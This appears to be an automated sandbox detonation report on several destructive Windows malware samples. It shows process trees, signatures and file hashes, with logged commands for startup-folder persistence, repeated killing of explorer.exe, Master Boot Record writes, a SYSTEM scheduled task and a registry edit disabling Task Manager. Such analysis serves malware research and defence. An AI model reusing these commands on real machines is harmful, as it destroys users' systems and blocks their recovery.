| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NetPakoe.bat"
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
Network
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat
| MD5 | 6c5a9741a170d3ac2e2c89d3e91ea6ea |
| SHA1 | 7034266eefee8c6437d966f5d91ea82e50e10d59 |
| SHA256 | 4d1a5d2255194f08a772aef2363514890ecd620dfc49e5b701fc8f2e2388e616 |
| SHA512 | 9dcf12e971da1c78d92dd7ff824d50e8487ae61bfb9dcbfea6c38f8ebba22994fde19d825e44f4632aba9e0fc34d75cd87e090b75ed78b51b908128cc22ce29c |
memory/2632-19-0x0000000000430000-0x0000000000431000-memory.dmp
memory/3064-40-0x00000000004B0000-0x00000000004B1000-memory.dmp
memory/2544-60-0x0000000000320000-0x0000000000321000-memory.dmp
memory/1508-99-0x0000000001F90000-0x0000000001F91000-memory.dmp
memory/1916-119-0x0000000002230000-0x0000000002231000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1900-135-0x0000000001FD0000-0x0000000001FD1000-memory.dmp
memory/568-181-0x0000000002030000-0x0000000002031000-memory.dmp
memory/1932-201-0x0000000001F90000-0x0000000001F91000-memory.dmp
memory/2000-204-0x0000000002030000-0x0000000002031000-memory.dmp
memory/2812-221-0x00000000022B0000-0x00000000022B1000-memory.dmp
memory/1544-254-0x0000000002050000-0x0000000002051000-memory.dmp
memory/1368-278-0x0000000002010000-0x0000000002011000-memory.dmp
memory/2712-295-0x00000000004B0000-0x00000000004B1000-memory.dmp
memory/824-315-0x0000000002130000-0x0000000002131000-memory.dmp
memory/2736-323-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
memory/1632-386-0x0000000001EB0000-0x0000000001EB1000-memory.dmp
memory/2400-394-0x0000000002530000-0x0000000002531000-memory.dmp
memory/2904-415-0x0000000002110000-0x0000000002111000-memory.dmp
memory/2000-440-0x0000000002030000-0x0000000002031000-memory.dmp
memory/1060-443-0x0000000001F50000-0x0000000001F51000-memory.dmp
memory/1568-457-0x0000000002030000-0x0000000002031000-memory.dmp
memory/1752-516-0x00000000023B0000-0x00000000023B1000-memory.dmp
memory/424-518-0x0000000001F30000-0x0000000001F31000-memory.dmp
memory/1864-532-0x00000000003C0000-0x00000000003C1000-memory.dmp
memory/936-536-0x0000000000450000-0x0000000000451000-memory.dmp
memory/612-566-0x0000000001F10000-0x0000000001F11000-memory.dmp
memory/1416-583-0x0000000000510000-0x0000000000511000-memory.dmp
memory/2032-597-0x0000000002130000-0x0000000002131000-memory.dmp
memory/2636-622-0x00000000021B0000-0x00000000021B1000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
114s
Max time network
41s
Command Line
Signatures
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\Fizz.exe"
Network
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win7-20240221-en
Max time kernel
145s
Max time network
134s
Command Line
Signatures
Disables Task Manager via registry modification
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\yourpc\boot.exe | N/A |
| N/A | N/A | C:\yourpc\INV.exe | N/A |
| N/A | N/A | C:\yourpc\tunnel.exe | N/A |
| N/A | N/A | C:\yourpc\melter.exe | N/A |
| N/A | N/A | C:\yourpc\10.exe | N/A |
| N/A | N/A | C:\yourpc\Magix.exe | N/A |
| N/A | N/A | C:\yourpc\RGB.exe | N/A |
| N/A | N/A | C:\yourpc\gl.exe | N/A |
| N/A | N/A | C:\yourpc\test.exe | N/A |
| N/A | N/A | C:\yourpc\Circle2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\yourpc\\boot.exe" | C:\yourpc\boot.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\yourpc\boot.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\yourpc\skid.bat" "
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\yourpc\run.vbs"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\yourpc\main.bat" "
C:\yourpc\boot.exe
boot.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN wininit /ru SYSTEM /SC ONSTART /TR "C:\yourpc\boot.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\yourpc\es.vbs"
C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\timeout.exe
timeout 10
C:\yourpc\INV.exe
INV.exe
C:\yourpc\tunnel.exe
tunnel.exe
C:\yourpc\melter.exe
melter.exe
C:\yourpc\10.exe
10.exe
C:\yourpc\Magix.exe
Magix.exe
C:\Windows\SysWOW64\timeout.exe
timeout 30
C:\Windows\SysWOW64\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Documents and Settings\Administrator\Desktop\18769.txt
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im tunnel.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im INV.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im melter.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Magix.exe
C:\Windows\SysWOW64\timeout.exe
timeout 20
C:\yourpc\RGB.exe
RGB.exe
C:\yourpc\gl.exe
gl.exe
C:\yourpc\test.exe
test.exe
C:\Windows\SysWOW64\timeout.exe
timeout 30
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im RGB.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im gl.exe
C:\yourpc\Circle2.exe
Circle2.exe
C:\Windows\SysWOW64\timeout.exe
timeout 30
Network
Files
C:\yourpc\skid.bat
| MD5 | 427d18145e233d828cdbad04596134c9 |
| SHA1 | 84cb6fae8ee844be1fd9eda8a6a74a5cce97ded8 |
| SHA256 | 23efa2c8b42c0c599a2bd60cadfab2eac3a439e891509dc70c1ee2a9f5e86f2c |
| SHA512 | fd5e0a70a4bd082311ab5559b832ba8ae8fce91a62faeec827e3a14a302ceda3697b2cc4d9f1c082170fe22ffff52b022791ebc8c6ec35a3946a9c3712e99444 |
C:\yourpc\run.vbs
| MD5 | 95cd248d3e5740a059a01eeef728ab48 |
| SHA1 | ae3e55904ade22ab4672f1f85db865e8e66fcff6 |
| SHA256 | ac59324226f082c21f5364d027f364086e86c9488dce674d7e93bf5c7c0cbcea |
| SHA512 | aa149aa3b524002defd4f92579f672e6e5f3f2deb5124f5adf8980e8386e0faf8f81a5b9667751ac6e19dd3b50f1688a7dfd147e18c9de229ce6f955184ad4b3 |
C:\yourpc\main.bat
| MD5 | d381fdbe8f6a130e25247fa1e029805b |
| SHA1 | 618a09cf851eb5bea77595df2e66412d2d954cba |
| SHA256 | 9eca23b0358e5507734ef7a2247c310c7be23c85776913c49947afb41c885273 |
| SHA512 | f1f7ca8d93c9764a6223121943fb2b31bd896df975a1c17f745a66cdd5777fe8e0197721da0b9e1610b2a5bdbd8b4ecb4d676df09baef7f35a038a7e5a97a444 |
C:\yourpc\boot.exe
| MD5 | 0b71c2b0a5cb052457abd1e09f6302cb |
| SHA1 | e17040a434a818b98d6c217bb73ccdcdc603c56a |
| SHA256 | 986192549387d257436b94d956234dce12f151ce6904de660e5d39cfce21b775 |
| SHA512 | fd3e41b1fc8e9aa5f1a5da6161be6f4aa277e3e1377f20ffd217004bc015ddbf3e4c80a7316d99fdfda6e32d497a0996eecb4ddc55b0b011e7c9a74944fbe1d5 |
memory/2692-124-0x0000000000400000-0x000000000043B000-memory.dmp
C:\yourpc\es.vbs
| MD5 | 9c2d6662913494f5f7ecc95564f87132 |
| SHA1 | e62502b0da2c9714b4cc1bae0f39c7014a9b2d00 |
| SHA256 | 095f01222915f9f8d71edb1593d70b7336c89aed4b42b14dc8e5cff482ab8d3b |
| SHA512 | 366b4739de8aaddf5133a9f50589e870b187ee0a366c4c3166adcb071c8d3aa180d978c3f85916690763dcd0d99449782ecd18df5144447695490b112f9d4cbc |
\yourpc\INV.exe
| MD5 | e079c468c9caed494623dbf95e9ce5e8 |
| SHA1 | 4d8d1d17e9d7ff455a5c69e048d7575b5a3ea0f7 |
| SHA256 | 8e217ce5670ac1021fdb6101372f9322f7ff82481ecd9badc104ff542e46128c |
| SHA512 | d9c1a6f28c0c76b6856dec8723eb79d1b620a70b8ab3b5f028848e890a684beeb3460e310959c69f21cffb0a14751ea6cb719aacdbc2043121f057dd56f868a8 |
C:\yourpc\tunnel.exe
| MD5 | 7dae1fb2e3a65e8dd594b021a6923e24 |
